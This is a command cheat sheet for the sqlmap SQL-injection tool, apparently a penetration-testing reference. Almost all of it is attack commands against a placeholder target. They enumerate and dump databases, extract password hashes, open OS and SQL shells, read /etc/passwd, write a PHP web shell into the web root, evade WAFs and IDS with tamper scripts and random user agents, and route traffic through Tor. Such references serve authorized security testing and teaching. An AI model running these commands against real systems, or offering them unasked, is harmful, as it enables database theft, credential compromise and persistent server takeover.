Basic Usage
sqlmap -u "http://TARGET/page?id=1"
sqlmap -u "http://TARGET/page?id=1" --batch # Auto-answer prompts
sqlmap -u "http://TARGET/page?id=1" --dbs # List databases
Request Options
POST Data
sqlmap -u "http://TARGET/login" --data="user=admin&pass=test"
Cookie
sqlmap -u "http://TARGET/page?id=1" --cookie="PHPSESSID=abc123"
sqlmap -u "http://TARGET/page?id=1" -H "Authorization: Bearer TOKEN"
sqlmap -u "http://TARGET/page?id=1" -H "X-Forwarded-For: 127.0.0.1"
From Burp Request File
sqlmap -r request.txt
sqlmap -r request.txt -p id # Specify parameter
Custom Injection Point
sqlmap -u "http://TARGET/page" --data="id=1*" # * marks injection point
sqlmap -r request.txt --headers="X-Custom: test*"
Enumeration
sqlmap -u URL --dbs # Databases
sqlmap -u URL -D dbname --tables # Tables
sqlmap -u URL -D dbname -T users --columns # Columns
sqlmap -u URL -D dbname -T users --dump # Dump table
sqlmap -u URL -D dbname -T users -C user,pass --dump # Specific columns
sqlmap -u URL --dump-all # Dump everything
Current Info
sqlmap -u URL --current-user
sqlmap -u URL --current-db
sqlmap -u URL --hostname
sqlmap -u URL --is-dba
sqlmap -u URL --privileges
sqlmap -u URL --passwords # Hash dump
Techniques
sqlmap -u URL --technique=U # UNION only
sqlmap -u URL --technique=B # Boolean blind only
sqlmap -u URL --technique=T # Time-based blind only
sqlmap -u URL --technique=E # Error-based only
sqlmap -u URL --technique=S # Stacked queries only
sqlmap -u URL --technique=BEUST # All (default)
| Flag | Technique |
|---|---|
| B | Boolean-based blind |
| E | Error-based |
| U | UNION query |
| S | Stacked queries |
| T | Time-based blind |
OS Shell & File Access
OS Shell
sqlmap -u URL --os-shell
sqlmap -u URL --os-cmd="whoami"
SQL Shell
sqlmap -u URL --sql-shell
File Read
sqlmap -u URL --file-read="/etc/passwd"
File Write
sqlmap -u URL --file-write="shell.php" --file-dest="/var/www/html/shell.php"
WAF / IDS Evasion
Tamper Scripts
sqlmap -u URL --tamper=space2comment
sqlmap -u URL --tamper=between,randomcase
sqlmap -u URL --tamper=charencode
Common Tampers
| Tamper | Description |
|---|---|
| space2comment | Replace spaces with /**/ |
| between | Replace > with NOT BETWEEN 0 AND |
| randomcase | Random upper/lower case |
| charencode | URL-encode characters |
| equaltolike | Replace = with LIKE |
| base64encode | Base64 encode payload |
| apostrophemask | Replace ' with UTF-8 |
| space2plus | Replace spaces with + |
List All Tampers
Other Evasion
sqlmap -u URL --random-agent
sqlmap -u URL --delay=2 # Delay between requests
sqlmap -u URL --time-sec=10 # Time-based wait
sqlmap -u URL --level=5 --risk=3 # Max detection
sqlmap -u URL --hpp # HTTP Parameter Pollution
sqlmap -u URL --threads=10
sqlmap -u URL --level=3 # 1-5, default 1
sqlmap -u URL --risk=2 # 1-3, default 1
| Level | Tests |
|---|---|
| 1 | GET/POST parameters |
| 2 | + Cookie |
| 3 | + User-Agent, Referer |
| 4 | + more payloads |
| 5 | + Host header |
Proxy & Tor
sqlmap -u URL --proxy="http://127.0.0.1:8080" # Burp proxy
sqlmap -u URL --tor --tor-type=SOCKS5 --check-tor
Second-Order Injection
sqlmap -r request.txt --second-url="http://TARGET/profile"
Quick Reference
| Task | Command |
|---|---|
| Auto scan | sqlmap -u URL --batch --dbs |
| Dump table | sqlmap -u URL -D db -T tbl --dump |
| OS shell | sqlmap -u URL --os-shell |
| Read file | sqlmap -u URL --file-read="/etc/passwd" |
| WAF bypass | sqlmap -u URL --tamper=space2comment --random-agent |
| From Burp | sqlmap -r request.txt -p param |